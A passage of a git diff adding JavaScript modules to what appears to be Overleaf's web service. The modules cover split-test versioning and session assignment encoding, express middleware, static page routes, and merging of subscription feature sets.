+    throw new OError(
+      'Cannot revert an archived split test to previous version',
+      {
+        name,
+      }
+    )
+  }
+  if (splitTest.versions.length <= 1) {
+    throw new OError(
+      `Cannot revert split test with ID '${name}' to previous version: split test must have at least 2 versions`
+    )
+  }
+  const previousVersion = SplitTestUtils.getVersion(splitTest, versionNumber)
+  if (!previousVersion) {
+    throw new OError(
+      `Cannot revert split test with ID '${name}' to version number ${versionNumber}: version not found`
+    )
+  }
+  const lastVersion = SplitTestUtils.getCurrentVersion(splitTest)
+  if (
+    lastVersion.phase === RELEASE_PHASE &&
+    previousVersion.phase !== RELEASE_PHASE
+  ) {
+    // reverting out of the release phase locks this test out of release (see switchToNextPhase)
+    splitTest.forbidReleasePhase = true
+  }
+  const previousVersionCopy =
previousVersion.toObject() + previousVersionCopy.versionNumber = lastVersion.versionNumber + 1 + previousVersionCopy.createdAt = new Date() + previousVersionCopy.author = userId + previousVersionCopy.comment = comment + splitTest.versions.push(previousVersionCopy) + return _saveSplitTest(splitTest) +} + +async function archive(name, userId) { + const splitTest = await getSplitTest({ name }) + if (!splitTest) { + throw new OError(`Cannot archive split test with ID '${name}': not found`) + } + if (splitTest.archived) { + throw new OError(`Split test with ID '${name}' is already archived`) + } + splitTest.archived = true + splitTest.archivedAt = new Date() + splitTest.archivedBy = userId + return _saveSplitTest(splitTest) +} + +async function clearCache() { + await CacheFlow.reset('split-test') +} + +function _checkNewVariantsConfiguration( + variants, + newVariantsConfiguration, + analyticsEnabled +) { + if (newVariantsConfiguration?.length > 1 && !analyticsEnabled) { + throw new OError(`Gradual rollouts can only have a single variant`) + } + + const totalRolloutPercentage = _getTotalRolloutPercentage( + newVariantsConfiguration + ) + if (totalRolloutPercentage > 100) { + throw new OError(`Total variants rollout percentage cannot exceed 100`) + } + for (const variant of variants) { + const newVariantConfiguration = _.find(newVariantsConfiguration, { + name: variant.name, + }) + if (!newVariantConfiguration) { + throw new OError( + `Variant defined in previous version as ${JSON.stringify( + variant + )} cannot be removed in new configuration: either set it inactive or create a new split test` + ) + } + if (newVariantConfiguration.rolloutPercent < variant.rolloutPercent) { + throw new OError( + `Rollout percentage for variant defined in previous version as ${JSON.stringify( + variant + )} cannot be decreased: revert to a previous configuration instead` + ) + } + } +} + +function _updateVariantsWithNewConfiguration( + variants, + newVariantsConfiguration +) { + let totalRolloutPercentage = _getTotalRolloutPercentage(variants) + const variantsCopy = _.clone(variants) + for (const newVariantConfig of newVariantsConfiguration) { + if (newVariantConfig.rolloutPercent === 0) { + continue + } + const variant = _.find(variantsCopy, { name: newVariantConfig.name }) + if (!variant) { + variantsCopy.push({ + name: newVariantConfig.name, + rolloutPercent: newVariantConfig.rolloutPercent, + rolloutStripes: [ + { + start: totalRolloutPercentage, + end: totalRolloutPercentage + newVariantConfig.rolloutPercent, + }, + ], + }) + totalRolloutPercentage += newVariantConfig.rolloutPercent + } else if (variant.rolloutPercent < newVariantConfig.rolloutPercent) { + const newStripeSize = + newVariantConfig.rolloutPercent - variant.rolloutPercent + variant.rolloutPercent = newVariantConfig.rolloutPercent + variant.rolloutStripes.push({ + start: totalRolloutPercentage, + end: totalRolloutPercentage + newStripeSize, + }) + totalRolloutPercentage += newStripeSize + } + } + return variantsCopy +} + +function _getTotalRolloutPercentage(variants) { + return _.sumBy(variants, 'rolloutPercent') +} + +async function _saveSplitTest(splitTest) { + try { + const savedSplitTest = await splitTest.save() + await savedSplitTest.populate('archivedBy', [ + 'email', + 'first_name', + 'last_name', + ]) + await savedSplitTest.populate('versions.author', [ + 'email', + 'first_name', + 'last_name', + ]) + return savedSplitTest.toObject() + } catch (error) { + throw OError.tag(error, 'Failed to save split test', { + splitTest: 
JSON.stringify(splitTest), + }) + } +} + +/* + * As this is only used for utility in local dev environment, we should make sure this isn't run in + * any other deployment environment. + */ +function _checkEnvIsSafe(operation) { + if (process.env.NODE_ENV !== 'development') { + throw new OError( + `Attempted to ${operation} all feature flags outside of local env` + ) + } +} + +async function _deleteSplitTests() { + _checkEnvIsSafe('delete') + let deleted + + try { + deleted = await SplitTest.deleteMany({}).exec() + } catch (error) { + throw new OError('Failed to delete all split tests') + } + + if (!deleted.acknowledged) { + throw new OError('Error deleting split tests, split tests have not updated') + } +} + +function _mergeFlags(incomingTests, baseTests) { + // copy all base versions + const mergedSet = baseTests.map(test => test) + for (const inTest of incomingTests) { + // since name is a unique key, we can use it to compare + const newFeatureFlag = !mergedSet.some(bTest => bTest.name === inTest.name) + // only add new feature flags, instead of overwriting ones in baseTests, meaning baseTests take precendence + if (newFeatureFlag) { + mergedSet.push(inTest) + } + } + return mergedSet +} + +module.exports = { + getSplitTest, + getSplitTests, + getRuntimeTests, + createSplitTest, + updateSplitTestConfig, + updateSplitTestInfo, + updateSplitTestBadgeInfo, + switchToNextPhase, + revertToPreviousVersion, + archive, + replaceSplitTests, + mergeSplitTests, + clearCache, +} diff --git a/services/web/app/src/Features/SplitTests/SplitTestMiddleware.js b/services/web/app/src/Features/SplitTests/SplitTestMiddleware.js new file mode 100644 index 0000000..2e8e1ff --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestMiddleware.js @@ -0,0 +1,49 @@ +const SplitTestHandler = require('./SplitTestHandler') +const logger = require('@overleaf/logger') +const { expressify } = require('@overleaf/promise-utils') +const Errors = require('../Errors/Errors') + +function loadAssignmentsInLocals(splitTestNames) { + return async function (req, res, next) { + try { + for (const splitTestName of splitTestNames) { + await SplitTestHandler.promises.getAssignment(req, res, splitTestName) + } + } catch (error) { + logger.error( + { err: error, splitTestNames }, + 'Failed to load split test assignments in express locals in middleware' + ) + } + next() + } +} + +function ensureSplitTestEnabledForUser( + splitTestName, + enabledVariant = 'enabled' +) { + return expressify(async function (req, res, next) { + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + splitTestName + ) + if (variant !== enabledVariant) { + throw new Errors.ForbiddenError({ + message: 'missing split test access', + info: { + splitTestName, + variant, + enabledVariant, + }, + }) + } + next() + }) +} + +module.exports = { + loadAssignmentsInLocals, + ensureSplitTestEnabledForUser, +} diff --git a/services/web/app/src/Features/SplitTests/SplitTestSessionHandler.js b/services/web/app/src/Features/SplitTests/SplitTestSessionHandler.js new file mode 100644 index 0000000..52d1352 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestSessionHandler.js @@ -0,0 +1,258 @@ +const { callbackify } = require('util') +const _ = require('lodash') +const { ObjectId } = require('mongodb-legacy') +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const SessionManager = require('../Authentication/SessionManager') +const SplitTestCache = require('./SplitTestCache') +const 
SplitTestUtils = require('./SplitTestUtils') +const SplitTestUserGetter = require('./SplitTestUserGetter') + +const CACHE_TOMBSTONE_SPLIT_TEST_NOT_ACTIVE_FOR_USER = null +const TOKEN_SEP = ';' +// this is safe to use as a separator adjacent to a base64 string because Mongo object IDs +// do not generate any padding when converted (24 hex digits = 12 bytes => multiple of 6), +// thus do not contain any trailing `=` +const KEY_VALUE_SEP = '=' +const ID_VERSION_SEP = '_' +const VARIANT_DATE_SEP = ':' + +async function getAssignments(session) { + await _convertAnonymousAssignmentsIfNeeded(session) + + if (!session.sta) { + return undefined + } + + const assignments = {} + const tokens = session.sta.split(TOKEN_SEP) + const splitTests = Array.from((await SplitTestCache.get('')).values()) + for (const token of tokens) { + try { + if (!token.length) { + continue + } + const [splitTestNameVersion, info] = token.split(KEY_VALUE_SEP) + const [splitTestId64, versionStr] = + splitTestNameVersion.split(ID_VERSION_SEP) + + const splitTest = splitTests.find( + test => splitTestId64 === _convertIdToBase64(test._id) + ) + if (!splitTest) { + continue + } + + const splitTestName = splitTest.name + const versionNumber = parseInt(versionStr) + const [variantChar, timestampStr36] = info.split(VARIANT_DATE_SEP) + const assignedAt = new Date(parseInt(timestampStr36, 36) * 1000) + let variantName + if (variantChar === 'd') { + variantName = 'default' + } else { + const variantIndex = parseInt(variantChar) + variantName = + SplitTestUtils.getCurrentVersion(splitTest).variants[variantIndex] + .name + } + + if (!assignments[splitTestName]) { + assignments[splitTestName] = [] + } + if ( + !_.find(assignments[splitTestName], { + versionNumber, + variantName, + }) + ) + assignments[splitTestName].push({ + versionNumber, + variantName, + phase: 'release', // anonymous users can only be exposed to tests in release phase + assignedAt, + }) + } catch (error) { + logger.error( + { err: error, token }, + 'Failed to resolve cached anonymous split test assignments from session' + ) + } + } + + return assignments +} + +async function appendAssignment(session, assignment) { + await _convertAnonymousAssignmentsIfNeeded(session) + + if ( + !_hasExistingAssignment( + session, + assignment.splitTestId, + assignment.versionNumber + ) + ) { + if (!session.sta) { + session.sta = '' + } + const splitTests = await SplitTestCache.get('') + const splitTest = splitTests.get(assignment.splitTestName) + const assignmentString = _buildAssignmentString(splitTest, assignment) + const separator = session.sta.length > 0 ? 
TOKEN_SEP : '' + session.sta += `${separator}${assignmentString}` + } +} + +function getCachedVariant(session, splitTestName, currentVersion) { + if (!session.cachedSplitTestAssignments) { + session.cachedSplitTestAssignments = {} + } + const cacheKey = `${splitTestName}-${currentVersion.versionNumber}` + return session.cachedSplitTestAssignments[cacheKey] +} + +function setVariantInCache({ + session, + splitTestName, + currentVersion, + selectedVariantName, + activeForUser, +}) { + if (!session.cachedSplitTestAssignments) { + session.cachedSplitTestAssignments = {} + } + + // clean up previous entries from this split test + for (const cacheKey of Object.keys(session.cachedSplitTestAssignments)) { + // drop '-versionNumber' + const name = cacheKey.split('-').slice(0, -1).join('-') + if (name === splitTestName) { + delete session.cachedSplitTestAssignments[cacheKey] + } + } + + const cacheKey = `${splitTestName}-${currentVersion.versionNumber}` + if (activeForUser) { + session.cachedSplitTestAssignments[cacheKey] = selectedVariantName + } else { + session.cachedSplitTestAssignments[cacheKey] = + CACHE_TOMBSTONE_SPLIT_TEST_NOT_ACTIVE_FOR_USER + } +} + +/** + * @param {import('express').Request} req + * @param {Object|null} user optional, prefetched user with alphaProgram and betaProgram field + * @return {Promise<void>} + */ +async function sessionMaintenance(req, user) { + const session = req.session + const sessionUser = SessionManager.getSessionUser(session) + + Metrics.inc('split_test_session_maintenance', 1, { status: 'start' }) + if (sessionUser) { + user = user || (await SplitTestUserGetter.promises.getUser(sessionUser._id)) + if ( + Boolean(sessionUser.alphaProgram) !== Boolean(user.alphaProgram) || + Boolean(sessionUser.betaProgram) !== Boolean(user.betaProgram) + ) { + Metrics.inc('split_test_session_maintenance', 1, { + status: 'program-change', + }) + sessionUser.alphaProgram = user.alphaProgram || undefined // only store if set + sessionUser.betaProgram = user.betaProgram || undefined // only store if set + session.cachedSplitTestAssignments = {} + } + } + + // TODO: After changing the split test config fetching: remove split test assignments for archived split tests +} + +function collectSessionStats(session) { + if (session.cachedSplitTestAssignments) { + Metrics.summary( + 'split_test_session_cache_count', + Object.keys(session.cachedSplitTestAssignments).length + ) + Metrics.summary( + 'split_test_session_cache_size', + JSON.stringify(session.cachedSplitTestAssignments).length + ) + } + if (session.sta) { + Metrics.summary( + 'split_test_session_storage_count', + (session.sta || '').split(';').length + ) + Metrics.summary( + 'split_test_session_storage_size', + (session.sta || '').length + ) + } +} + +async function _convertAnonymousAssignmentsIfNeeded(session) { + if (session.splitTests) { + const splitTests = await SplitTestCache.get('') + if (!session.sta) { + session.sta = '' + } + for (const [splitTestName, assignments] of Object.entries( + session.splitTests || {} + )) { + const splitTest = splitTests.get(splitTestName) + for (const assignment of assignments) { + const assignmentString = _buildAssignmentString(splitTest, assignment) + const separator = session.sta.length > 0 ? 
TOKEN_SEP : ''
+        if (!session.sta.includes(assignmentString)) {
+          session.sta += `${separator}${assignmentString}`
+        }
+      }
+    }
+    delete session.splitTests
+  }
+}
+
+function _hasExistingAssignment(session, splitTest, versionNumber) {
+  if (!session.sta) {
+    return false
+  }
+  const index = session.sta.indexOf(
+    `${_convertIdToBase64(splitTest._id)}${ID_VERSION_SEP}${versionNumber}=`
+  )
+  return index >= 0
+}
+
+function _buildAssignmentString(splitTest, assignment) {
+  const { versionNumber, variantName, assignedAt } = assignment
+  const variants = SplitTestUtils.getCurrentVersion(splitTest).variants
+  const splitTestId = _convertIdToBase64(splitTest._id)
+  const variantChar =
+    variantName === 'default'
+      ? 'd'
+      : _.findIndex(variants, { name: variantName })
+  const timestamp = Math.floor(new Date(assignedAt).getTime() / 1000).toString(
+    36
+  )
+  return `${splitTestId}${ID_VERSION_SEP}${versionNumber}${KEY_VALUE_SEP}${variantChar}${VARIANT_DATE_SEP}${timestamp}`
+}
+
+function _convertIdToBase64(id) {
+  return new ObjectId(id).toString('base64')
+}
+
+module.exports = {
+  getAssignments: callbackify(getAssignments),
+  appendAssignment: callbackify(appendAssignment),
+  getCachedVariant,
+  setVariantInCache,
+  sessionMaintenance: callbackify(sessionMaintenance),
+  collectSessionStats,
+  CACHE_TOMBSTONE_SPLIT_TEST_NOT_ACTIVE_FOR_USER,
+  promises: {
+    getAssignments,
+    appendAssignment,
+    sessionMaintenance,
+  },
+}
diff --git a/services/web/app/src/Features/SplitTests/SplitTestUserGetter.js b/services/web/app/src/Features/SplitTests/SplitTestUserGetter.js
new file mode 100644
index 0000000..cf6503c
--- /dev/null
+++ b/services/web/app/src/Features/SplitTests/SplitTestUserGetter.js
@@ -0,0 +1,30 @@
+const { callbackify } = require('util')
+const Metrics = require('@overleaf/metrics')
+const UserGetter = require('../User/UserGetter')
+
+async function getUser(id, splitTestName) {
+  const projection = {
+    analyticsId: 1,
+    alphaProgram: 1,
+    betaProgram: 1,
+  }
+  if (splitTestName) {
+    projection[`splitTests.${splitTestName}`] = 1
+  } else {
+    projection.splitTests = 1
+  }
+  const user = await UserGetter.promises.getUser(id, projection)
+  Metrics.histogram(
+    'split_test_get_user_from_mongo_size',
+    JSON.stringify(user).length,
+    [0, 100, 500, 1000, 2000, 5000, 10000, 15000, 20000, 50000, 100000]
+  )
+  return user
+}
+
+module.exports = {
+  getUser: callbackify(getUser),
+  promises: {
+    getUser,
+  },
+}
diff --git a/services/web/app/src/Features/SplitTests/SplitTestUtils.js b/services/web/app/src/Features/SplitTests/SplitTestUtils.js
new file mode 100644
index 0000000..ef26dbe
--- /dev/null
+++ b/services/web/app/src/Features/SplitTests/SplitTestUtils.js
@@ -0,0 +1,20 @@
+const _ = require('lodash')
+
+function getCurrentVersion(splitTest) {
+  if (splitTest?.versions?.length > 0) {
+    return _.maxBy(splitTest.versions, 'versionNumber')
+  } else {
+    return undefined
+  }
+}
+
+function getVersion(splitTest, versionNumber) {
+  return _.find(splitTest.versions || [], {
+    versionNumber,
+  })
+}
+
+module.exports = {
+  getCurrentVersion,
+  getVersion,
+}
diff --git a/services/web/app/src/Features/SplitTests/types.d.ts b/services/web/app/src/Features/SplitTests/types.d.ts
new file mode 100644
index 0000000..47e04de
--- /dev/null
+++ b/services/web/app/src/Features/SplitTests/types.d.ts
@@ -0,0 +1,12 @@
+type AssignmentMetadata = {
+  phase?: 'alpha' | 'beta' | 'release'
+  versionNumber?: number
+  // only returned when `analyticsEnabled` is set to `true` on the current version
+  // of the split
test, and an assignment is queried for the user for the first time + isFirstNonDefaultAssignment?: boolean +} + +export type Assignment = { + variant: string + metadata: AssignmentMetadata +} diff --git a/services/web/app/src/Features/StaticPages/HomeController.mjs b/services/web/app/src/Features/StaticPages/HomeController.mjs new file mode 100644 index 0000000..cc73612 --- /dev/null +++ b/services/web/app/src/Features/StaticPages/HomeController.mjs @@ -0,0 +1,63 @@ +import Features from '../../infrastructure/Features.js' +import AnalyticsManager from '../Analytics/AnalyticsManager.js' +import Path from 'node:path' +import fs from 'node:fs' +import ErrorController from '../Errors/ErrorController.js' +import SessionManager from '../Authentication/SessionManager.js' +import { expressify } from '@overleaf/promise-utils' +import logger from '@overleaf/logger' + +const __dirname = new URL('.', import.meta.url).pathname + +const homepageExists = fs.existsSync( + Path.join(__dirname, '/../../../views/external/home/index.pug') +) + +async function index(req, res) { + if (SessionManager.isUserLoggedIn(req.session)) { + if (req.query.scribtex_path != null) { + res.redirect(`/project?scribtex_path=${req.query.scribtex_path}`) + } else { + res.redirect('/project') + } + } else { + await home(req, res) + } +} + +async function home(req, res) { + if (Features.hasFeature('homepage') && homepageExists) { + AnalyticsManager.recordEventForSession(req.session, 'home-page-view', { + page: req.path, + }) + + res.render('external/home/index') + } else { + res.redirect('/login') + } +} + +function externalPage(page, title) { + const middleware = async function (req, res, next) { + const path = Path.join(__dirname, `/../../../views/external/${page}.pug`) + try { + const stats = await fs.promises.stat(path) + if (!stats.isFile()) { + logger.error({ stats, path }, 'Error serving external page') + ErrorController.notFound(req, res, next) + } else { + res.render(`external/${page}.pug`, { title }) + } + } catch (error) { + logger.error({ path }, 'Error serving external page: file not found') + ErrorController.notFound(req, res, next) + } + } + return expressify(middleware) +} + +export default { + index: expressify(index), + home: expressify(home), + externalPage, +} diff --git a/services/web/app/src/Features/StaticPages/StaticPageHelpers.mjs b/services/web/app/src/Features/StaticPages/StaticPageHelpers.mjs new file mode 100644 index 0000000..e9fa268 --- /dev/null +++ b/services/web/app/src/Features/StaticPages/StaticPageHelpers.mjs @@ -0,0 +1,32 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import _ from 'lodash' + +const extensionsToProxy = [ + '.png', + '.xml', + '.jpeg', + '.json', + '.zip', + '.eps', + '.gif', + '.jpg', +] + +export default { + shouldProxy(url) { + const shouldProxy = _.find( + extensionsToProxy, + extension => url.indexOf(extension) !== -1 + ) + return shouldProxy + }, +} diff --git a/services/web/app/src/Features/StaticPages/StaticPagesRouter.mjs b/services/web/app/src/Features/StaticPages/StaticPagesRouter.mjs new file mode 100644 index 0000000..b81e25c --- /dev/null +++ b/services/web/app/src/Features/StaticPages/StaticPagesRouter.mjs @@ -0,0 +1,33 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import HomeController from './HomeController.mjs' + +import UniversityController from './UniversityController.mjs' + +export default { + apply(webRouter) { + webRouter.get('/', HomeController.index) + webRouter.get('/home', HomeController.home) + + webRouter.get( + '/planned_maintenance', + HomeController.externalPage('planned_maintenance', 'Planned Maintenance') + ) + + webRouter.get( + '/track-changes-and-comments-in-latex', + HomeController.externalPage('review-features-page', 'Review features') + ) + + webRouter.get('/university', UniversityController.getIndexPage) + return webRouter.get('/university/*', UniversityController.getPage) + }, +} diff --git a/services/web/app/src/Features/StaticPages/UniversityController.mjs b/services/web/app/src/Features/StaticPages/UniversityController.mjs new file mode 100644 index 0000000..35fec9f --- /dev/null +++ b/services/web/app/src/Features/StaticPages/UniversityController.mjs @@ -0,0 +1,24 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let UniversityController + +export default UniversityController = { + getPage(req, res, next) { + const url = + req.url != null ? 
req.url.toLowerCase().replace('.html', '') : undefined + return res.redirect(`/i${url}`) + }, + + getIndexPage(req, res) { + return res.redirect('/i/university') + }, +} diff --git a/services/web/app/src/Features/Subscription/Errors.js b/services/web/app/src/Features/Subscription/Errors.js new file mode 100644 index 0000000..53ecf7b --- /dev/null +++ b/services/web/app/src/Features/Subscription/Errors.js @@ -0,0 +1,36 @@ +const Errors = require('../Errors/Errors') +const OError = require('@overleaf/o-error') + +class RecurlyTransactionError extends Errors.BackwardCompatibleError { + constructor(options) { + super({ + message: 'Unknown transaction error', + ...options, + }) + } +} + +class DuplicateAddOnError extends OError {} + +class AddOnNotPresentError extends OError {} + +class MissingBillingInfoError extends OError {} + +class ManuallyCollectedError extends OError {} + +class PendingChangeError extends OError {} + +class InactiveError extends OError {} + +class SubtotalLimitExceededError extends OError {} + +module.exports = { + RecurlyTransactionError, + DuplicateAddOnError, + AddOnNotPresentError, + MissingBillingInfoError, + ManuallyCollectedError, + PendingChangeError, + InactiveError, + SubtotalLimitExceededError, +} diff --git a/services/web/app/src/Features/Subscription/FeaturesHelper.js b/services/web/app/src/Features/Subscription/FeaturesHelper.js new file mode 100644 index 0000000..b948815 --- /dev/null +++ b/services/web/app/src/Features/Subscription/FeaturesHelper.js @@ -0,0 +1,122 @@ +const _ = require('lodash') +const Settings = require('@overleaf/settings') + +/** + * merges an array of feature sets to produce a final feature set + */ +function computeFeatureSet(featureSets) { + return featureSets.reduce(mergeFeatures, {}) +} + +/** + * Merge feature sets coming from different sources + */ +function mergeFeatures(featuresA, featuresB) { + const features = Object.assign({}, featuresA) + for (const key in featuresB) { + // Special merging logic for non-boolean features + if (key === 'compileGroup') { + if ( + features.compileGroup === 'priority' || + featuresB.compileGroup === 'priority' + ) { + features.compileGroup = 'priority' + } else { + features.compileGroup = 'standard' + } + } else if (key === 'collaborators') { + if (features.collaborators === -1 || featuresB.collaborators === -1) { + features.collaborators = -1 + } else { + features.collaborators = Math.max( + features.collaborators || 0, + featuresB.collaborators || 0 + ) + } + } else if (key === 'compileTimeout') { + features.compileTimeout = Math.max( + features.compileTimeout || 0, + featuresB.compileTimeout || 0 + ) + } else { + // Boolean keys, true is better + features[key] = features[key] || featuresB[key] + } + } + if (features.mendeley && features.referencesSearch && features.zotero) { + // Back fill legacy feature flag for isFeatureSetBetter to work properly + // with professional feature overrides. 
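+    // Without this back fill, a feature set that already includes mendeley, referencesSearch
+    // and zotero would appear to be missing `references` when compared (via _.isEqual in
+    // isFeatureSetBetter) against a professional override that sets `references` explicitly.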
+ features.references = true + } + return features +} + +/** + * Returns whether `featuresA` is a better feature set than `featuresB` + */ +function isFeatureSetBetter(featuresA, featuresB) { + const mergedFeatures = mergeFeatures(featuresA, featuresB) + return _.isEqual(featuresA, mergedFeatures) +} + +/** + * Return what's missing from `currentFeatures` to equal `expectedFeatures` + */ +function compareFeatures(currentFeatures, expectedFeatures) { + currentFeatures = _.clone(currentFeatures) + expectedFeatures = _.clone(expectedFeatures) + if (_.isEqual(currentFeatures, expectedFeatures)) { + return {} + } + + const mismatchReasons = {} + const featureKeys = [ + ...new Set([ + ...Object.keys(currentFeatures), + ...Object.keys(expectedFeatures), + ]), + ] + featureKeys.sort().forEach(key => { + if (expectedFeatures[key] !== currentFeatures[key]) { + mismatchReasons[key] = expectedFeatures[key] + } + }) + + if (mismatchReasons.compileTimeout) { + // store the compile timeout difference instead of the new compile timeout + mismatchReasons.compileTimeout = + expectedFeatures.compileTimeout - currentFeatures.compileTimeout + } + + if (mismatchReasons.collaborators) { + // store the collaborators difference instead of the new number only + // replace -1 by 100 to make it clearer + if (expectedFeatures.collaborators === -1) { + expectedFeatures.collaborators = 100 + } + if (currentFeatures.collaborators === -1) { + currentFeatures.collaborators = 100 + } + mismatchReasons.collaborators = + expectedFeatures.collaborators - currentFeatures.collaborators + } + + return mismatchReasons +} + +function getMatchedFeatureSet(features) { + for (const [name, featureSet] of Object.entries(Settings.features)) { + if (_.isEqual(features, featureSet)) { + return name + } + } + return 'mixed' +} + +module.exports = { + mergeFeatures, + computeFeatureSet, + isFeatureSetBetter, + compareFeatures, + getMatchedFeatureSet, +} diff --git a/services/web/app/src/Features/Subscription/FeaturesUpdater.js b/services/web/app/src/Features/Subscription/FeaturesUpdater.js new file mode 100644 index 0000000..eff88d4 --- /dev/null +++ b/services/web/app/src/Features/Subscription/FeaturesUpdater.js @@ -0,0 +1,228 @@ +const _ = require('lodash') +const { callbackify } = require('util') +const { callbackifyMultiResult } = require('@overleaf/promise-utils') +const PlansLocator = require('./PlansLocator') +const SubscriptionLocator = require('./SubscriptionLocator') +const UserFeaturesUpdater = require('./UserFeaturesUpdater') +const FeaturesHelper = require('./FeaturesHelper') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const ReferalFeatures = require('../Referal/ReferalFeatures') +const V1SubscriptionManager = require('./V1SubscriptionManager') +const InstitutionsFeatures = require('../Institutions/InstitutionsFeatures') +const UserGetter = require('../User/UserGetter') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const Queues = require('../../infrastructure/Queues') +const Modules = require('../../infrastructure/Modules') +const { AI_ADD_ON_CODE } = require('./PaymentProviderEntities') + +/** + * Enqueue a job for refreshing features for the given user + */ +async function scheduleRefreshFeatures(userId, reason) { + const queue = Queues.getQueue('refresh-features') + await queue.add({ userId, reason }) +} + +/* Check if user features refresh if needed, based on the global featuresEpoch setting */ +function featuresEpochIsCurrent(user) { + return 
Settings.featuresEpoch + ? user.featuresEpoch === Settings.featuresEpoch + : true +} + +/** + * Refresh features for the given user + */ +async function refreshFeatures(userId, reason) { + const user = await UserGetter.promises.getUser(userId, { + _id: 1, + features: 1, + }) + const oldFeatures = _.clone(user.features) + const features = await computeFeatures(userId) + logger.debug({ userId, features }, 'updating user features') + + const matchedFeatureSet = FeaturesHelper.getMatchedFeatureSet(features) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'feature-set', + matchedFeatureSet + ) + + const { features: newFeatures, featuresChanged } = + await UserFeaturesUpdater.promises.updateFeatures(userId, features) + if (oldFeatures.dropbox === true && features.dropbox === false) { + logger.debug({ userId }, '[FeaturesUpdater] must unlink dropbox') + try { + await Modules.promises.hooks.fire('removeDropbox', userId, reason) + } catch (err) { + logger.error({ err, userId }, 'removeDropbox hook failed') + } + } + + if (oldFeatures.github === true && features.github === false) { + logger.debug({ userId }, '[FeaturesUpdater] must unlink github') + try { + await Modules.promises.hooks.fire('removeGithub', userId, reason) + } catch (err) { + logger.error({ err, userId }, 'removeGithub hook failed') + } + } + + return { features: newFeatures, featuresChanged } +} + +/** + * Return the features that the given user should have. + */ +async function computeFeatures(userId) { + const individualFeatures = await _getIndividualFeatures(userId) + const groupFeatureSets = await _getGroupFeatureSets(userId) + const institutionFeatures = + await InstitutionsFeatures.promises.getInstitutionsFeatures(userId) + const user = await UserGetter.promises.getUser(userId, { + featuresOverrides: 1, + 'overleaf.id': 1, + }) + const v1Features = await _getV1Features(user) + const bonusFeatures = await ReferalFeatures.promises.getBonusFeatures(userId) + const featuresOverrides = await _getFeaturesOverrides(user) + logger.debug( + { + userId, + individualFeatures, + groupFeatureSets, + institutionFeatures, + v1Features, + bonusFeatures, + featuresOverrides, + }, + 'merging user features' + ) + const featureSets = groupFeatureSets.concat([ + individualFeatures, + institutionFeatures, + v1Features, + bonusFeatures, + featuresOverrides, + ]) + return _.reduce( + featureSets, + FeaturesHelper.mergeFeatures, + Settings.defaultFeatures + ) +} + +async function _getIndividualFeatures(userId) { + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + if (subscription == null || subscription?.recurlyStatus?.state === 'paused') { + return {} + } + + const featureSets = [] + + // The plan doesn't apply to the group admin when the subscription + // is a group subscription + if (!subscription.groupPlan) { + featureSets.push(_subscriptionToFeatures(subscription)) + } + + featureSets.push(_aiAddOnFeatures(subscription)) + return _.reduce(featureSets, FeaturesHelper.mergeFeatures, {}) +} + +async function _getGroupFeatureSets(userId) { + const subs = + await SubscriptionLocator.promises.getGroupSubscriptionsMemberOf(userId) + return (subs || []).map(_subscriptionToFeatures) +} + +async function _getFeaturesOverrides(user) { + if (!user || !user.featuresOverrides || user.featuresOverrides.length === 0) { + return {} + } + const activeFeaturesOverrides = [] + for (const featuresOverride of user.featuresOverrides) { + if ( + !featuresOverride.expiresAt || + featuresOverride.expiresAt > new 
Date() + ) { + activeFeaturesOverrides.push(featuresOverride.features) + } + } + return _.reduce(activeFeaturesOverrides, FeaturesHelper.mergeFeatures, {}) +} + +async function _getV1Features(user) { + const v1Id = user?.overleaf?.id + return V1SubscriptionManager.getGrandfatheredFeaturesForV1User(v1Id) || {} +} + +function _subscriptionToFeatures(subscription) { + if (!subscription?.planCode) { + return {} + } + const plan = PlansLocator.findLocalPlanInSettings(subscription.planCode) + if (!plan) { + return {} + } else { + return plan.features + } +} + +function _aiAddOnFeatures(subscription) { + if (subscription?.addOns?.some(addOn => addOn.addOnCode === AI_ADD_ON_CODE)) { + return { aiErrorAssistant: true } + } else { + return {} + } +} + +async function doSyncFromV1(v1UserId) { + logger.debug({ v1UserId }, '[AccountSync] starting account sync') + const user = await UserGetter.promises.getUser( + { 'overleaf.id': v1UserId }, + { _id: 1 } + ) + if (user == null) { + logger.warn({ v1UserId }, '[AccountSync] no user found for v1 id') + return + } + logger.debug( + { v1UserId, userId: user._id }, + '[AccountSync] updating user subscription and features' + ) + return refreshFeatures(user._id, 'sync-v1') +} + +async function hasFeaturesViaWritefull(userId) { + const user = await UserGetter.promises.getUser(userId, { + _id: 1, + writefull: 1, + }) + return Boolean(user?.writefull?.isPremium) +} + +module.exports = { + featuresEpochIsCurrent, + computeFeatures: callbackify(computeFeatures), + refreshFeatures: callbackifyMultiResult(refreshFeatures, [ + 'features', + 'featuresChanged', + ]), + doSyncFromV1: callbackifyMultiResult(doSyncFromV1, [ + 'features', + 'featuresChanged', + ]), + scheduleRefreshFeatures: callbackify(scheduleRefreshFeatures), + hasFeaturesViaWritefull: callbackify(hasFeaturesViaWritefull), + promises: { + computeFeatures, + refreshFeatures, + scheduleRefreshFeatures, + doSyncFromV1, + hasFeaturesViaWritefull, + }, +} diff --git a/services/web/app/src/Features/Subscription/GroupPlansData.js b/services/web/app/src/Features/Subscription/GroupPlansData.js new file mode 100644 index 0000000..971a01f --- /dev/null +++ 